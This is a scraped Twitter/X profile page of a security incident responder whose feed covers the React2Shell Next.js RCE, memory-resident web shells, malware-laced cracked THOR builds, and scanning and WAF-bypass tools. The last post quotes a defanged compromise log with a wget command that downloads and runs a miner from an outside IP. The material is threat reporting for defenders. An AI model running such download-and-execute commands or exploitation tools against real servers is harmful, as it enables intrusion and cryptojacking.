Arik Nachmias
@M0teki
Followers
622
Following
11K
Media
190
Statuses
3K
CEO & Co-founder - Honey Badger Security / Codeseal / Badgerguard | Incident Responder | https://t.co/IqyBEYtGlc https://t.co/G72VLA6Hdm https://t.co/QLeZuRJqWw
Tel Aviv , Israel
Joined August 2009
THC Release 💥: The world’s largest IP<>Domain database: https://t.co/I9OIucDu2T All forward and reverse IPs, all CNAMES and all subdomains of every domain. For free. Updated monthly. Try: curl https://t.co/HUrGIrdpLd Raw data (187GB): https://t.co/GM3L2DJYKF (The fine work
35
386
2K
We only use LLMs where it makes sense. After ~2 years of testing, the useful spot is working on rich scan telemetry - not just explaining alerts. We feed it the info-level signal in THOR reports (process trees, services, users, tasks, etc.) so it can correlate and surface
Say hello to RuneAI 🤖⚡️ We’ve been working on our internal AI service, RuneAI, for almost a year. Today is the first public showcase of what it does. RuneAI’s job is to sit on top of THOR output and help with triage: take large, messy result streams (often full of low-level or
1
17
167
I’m a bit quieter than usual because I’ve been tinkering with a small open source project… 🤫 It’s about collecting forensic evidence on Linux systems that tend to be awkward in practice - embedded devices, containers, older distros, odd cloud images, etc. - Collector: POSIX
6
40
376
Amazing Tweet. So sad. So true.
1K
12K
115K
Never forget
11K
96K
773K
Here's our new blogpost with a technical deepdive into exploitation we're observing in the wild of CVE-2025-55182 (aka react2shell): https://t.co/jBvMgTqjEO
3
42
96
You'll probably hear the term #memshell more often. It is used for shells (web shells) that get implanted into memory. the most common ones used in the exploitation of #React2shell register two API endpoints that respond to a cmd=xxx command /exec /nodesync example:
1
15
129
Someone helpfully shared yet another "free" THOR build on VT. It’s the real scanner, just repackaged with a .NET stealer and a ScreenConnect dropper on top. We keep an eye on VT uploads of THOR and see this kind of bundle regularly. If you’re running cracked security tools on
1
15
152
I've developed a professional and technical tool for Next.js (CVE-2025-55182) 🥳 I'm offering this tool, which allows you to perform both bulk and individual scans, as well as testing on live subdomains. github; https://t.co/qMOoXmBJ9j
#DevTools #python #bugbountytip
15
176
961
🚨 Critical React & Next.js RCE Vulnerabilities (CVE-2025-55182 & CVE-2025-66478) Both CVSS 10.0 A severe flaw in React Server Components and Next.js enables unauthenticated Remote Code Execution across millions of exposed applications. FOFA: ▪️Query: app="NEXT.JS" ||
3
66
337
Pretty much
17K
36K
314K
A story as old as time. Sadly the industry places wafs as this magical Harry Potter coat of invisibility and in reality….
Vercel is questioning whether or not a WAF bypass is possible... Pushed an update that uses a payload from @SLCyberSec research team (specifically @hash_kitten). Payload has been running for @assetnote customers for last 18h. https://t.co/9CqANckHK0 use --vercel-waf-bypass flag
5
7
84
i've been hacked and traced the malware's wallet to see how much money they actually made from this new exploit (if you use Next.js/React, READ THIS!) I woke up to a terrifying email from Hetzner: "Netscan Detected." my server was blocked and a botnet was using my IP to
273
884
5K
Never hire criminals. They don’t have the core values needed for a job like that.
5
14
155
Here are my Opus 4.5 thoughts after ~2 weeks of use. First some general thoughts, then some practical stuff. --- THE BIG PICTURE --- THE UNLOCK FOR AGENTS It's clear to anyone who's used Opus 4.5 that AI progress isn't slowing down. I'm surprised more people aren't treating
166
271
3K
🚨@zachxbt is reporting that the British threat actor known as Danny/Meech, believed to be Danish Zulfiqar (Khan), appears to have been arrested, with law enforcement likely seizing his crypto assets. Roughly $18.58M, at the time of Zach's post, is now sitting in
26
84
847
Someone emailed me a log from a VPS with a vulnerable NextJS version that was presumably compromised by React2Shell. Unsure if others are seeing similar, but seems to be dumbo cryptominer. - ping 45.157.233[.]80 - wget http[:]//45.76.155[.]14/vim -O /tmp/vim ; chmod +x
22
92
792
